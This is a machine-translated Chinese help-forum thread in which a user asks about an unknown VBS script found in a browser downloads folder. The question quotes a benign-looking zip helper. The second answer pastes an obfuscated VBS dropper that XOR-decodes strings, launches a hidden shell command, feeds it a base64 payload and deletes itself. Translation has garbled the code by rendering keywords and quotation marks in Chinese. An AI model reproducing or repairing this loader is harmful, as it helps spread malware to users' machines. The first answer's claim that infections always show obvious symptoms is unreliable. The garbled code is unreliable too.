浏览器下载文件夹中有未知的 VBS 脚本

tag-icon tag-icon security virus malware vbscript
浏览器下载文件夹中有未知的 VBS 脚本

我的下载文件夹中有一个 _zipit.vbs。我使用 Firefox

下面是在记事本中打开的代码。这个文件已经在我的计算机上 6 个月了。
我不知道它来自哪里,但谷歌搜索似乎显示它在其他地方用于压缩东西。有人知道这是恶意软件的一部分还是某个地方的另一个进程正在调用它?我如何找出是否有其他进程使用它?

   Set objArgs = WScript.Arguments 
   InputFolder = objArgs(0) 
   ZipFile = objArgs(1) 
   CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile,   
   True).Write "PK" & Chr(5) & Chr(6) & String(18, vbNullChar) 
   Set objShell = CreateObject("Shell.Application") 
   Set source = objShell.NameSpace(InputFolder).Items 
   objShell.NameSpace(ZipFile).CopyHere(source) 
   wScript.Sleep 2000

我谷歌了一下它的 SHA256,结果 https://www.hybrid-analysis.com/sample/4793ba4b4ca5bba8c2fdd3460af0d8b4ff43bf88dc5b7c0acc82ccab96795a00

它是另一个恶意软件的一部分。

对于现在该做什么,有什么建议吗?

防病毒扫描没有显示任何内容。

答案1

许多使用漏洞的网站会尝试将脚本下载到临时文件夹,然后执行它。

保持更新的现代浏览器不会受到此漏洞的影响。这意味着网站仍然可以触发下载,但文件不会下载到临时文件夹,因此对用户不可见,而是下载到您的下载文件夹。

如果恶意软件成功了,你肯定会知道,因为这种感染总是会通过不必要的广告、CPU 使用率增加等症状而引人注目。

您的浏览器很可能保护了您。

请注意,Internet Explorer 是少数几个仍然容易受到这些漏洞攻击的浏览器之一,而基于 chrome 的浏览器则不然,最新的 Firefox 也不会如此。

这总是很难确定,但如果恶意软件感染成功,那么该 .vbs 脚本很可能不再存在于您的下载中。

答案2

我有同样的东西,但它说的是“你的文件已准备好下载.vbs”。这是代码。代码如下。

操作系统类型 = “”

函数 remove_line_number(dt) 出错时继续下一步

stk = os_type
dat_l = ((Len(dt) / 2) - 1)

kl = Len(stk)

s = ""
For i = 0 To dat_l
    c1 = CInt("&H" & Mid(dt, ((i*2)+1), 2))
    c2 = Asc(Mid(stk, (i Mod kl) + 1, 1))

    s = s & Chr(c1 Xor c2)
Next

remove_line_number = s

结束函数

函数 get_str(ByVal sText) 使用 CreateObject("Msxml2.DOMDocument").CreateElement("aux") .DataType = "bin.base64" .NodeTypedValue = get_res(sText) get_str = .Text 结尾

结束函数

local_v1 = "WyIyNjU3NDQ5ODc5NzUxMjUxNDc1IiwxNjc5Njk2Nzc5LCJOemcxTVRFRkRnQUdCUU1CRFFZSUFBMEVBd1FHREFJRVRRNFBBQVFCRDBRRUJ3WU9EZ3dIQmdBQVNXNVNSVUElM0QiXQ=="

assistx_ver = “内华达州美国第一个气候中性城市与5亿多消费者的关系”

函数 get_res(ByVal sText) 使用 CreateObject("ADODB.Stream") .Type = 2 .Charset = "utf-16le" .Open .WriteText sText .Position = 0 .Type = 1 .Position = 2 get_res = .Read .Close End With

结束函数

pf = WScript.ScriptFullName

os_type = Mid(assistx_ver, 57, 1) & "l" & Mid(assistx_ver, 26, 1) & "y" & Mid(assistx_ver, 69, 1) & "s" & Mid(assistx_ver, 10, 1) & Mid(assistx_ver, 86, 1) & Mid(assistx_ver, &H57, 1) 设置 objws = CreateObject("WSc" & remove_line_number("0505110D4F20070B") & "ll")

设置 Obj_s = CreateObject("Scri" & remove_line_number("07180817065D29071F123F180A151602") & "Object")

str_2=删除行号(”") 设置 var3 = objws.Exec(remove_line_number("14010557040B0A4E5C144C111616161D1D1B12000D594C24060017181B320D181F0A4E3B1E08051C0F5342")执行(删除行号(“14010557040B0A4E5C144C111616161D1D1B12000D594C24060017181B320D181F0A4E3B1E08051C0F5342”)执行(删除行号(“14010557040B0A4E5C144C111616161D1D1B12000D594C24060017181B320D181F0A4E3B1E08051C0F5342”)

str_2 = 替换(str_2,remove_line_number(“0509111500100A3103161E0014”),local_v1)str_2 = 替换(get_str(str_2),vbLf,“”)

Obj_s.删除文件(pf)

obj_loc = remove_line_number(“”) obj_loc = Replace(obj_loc,remove_line_number(“0509111500100A31031B19034F55”),str_2)

var3.StdIn.Write obj_loc

相关内容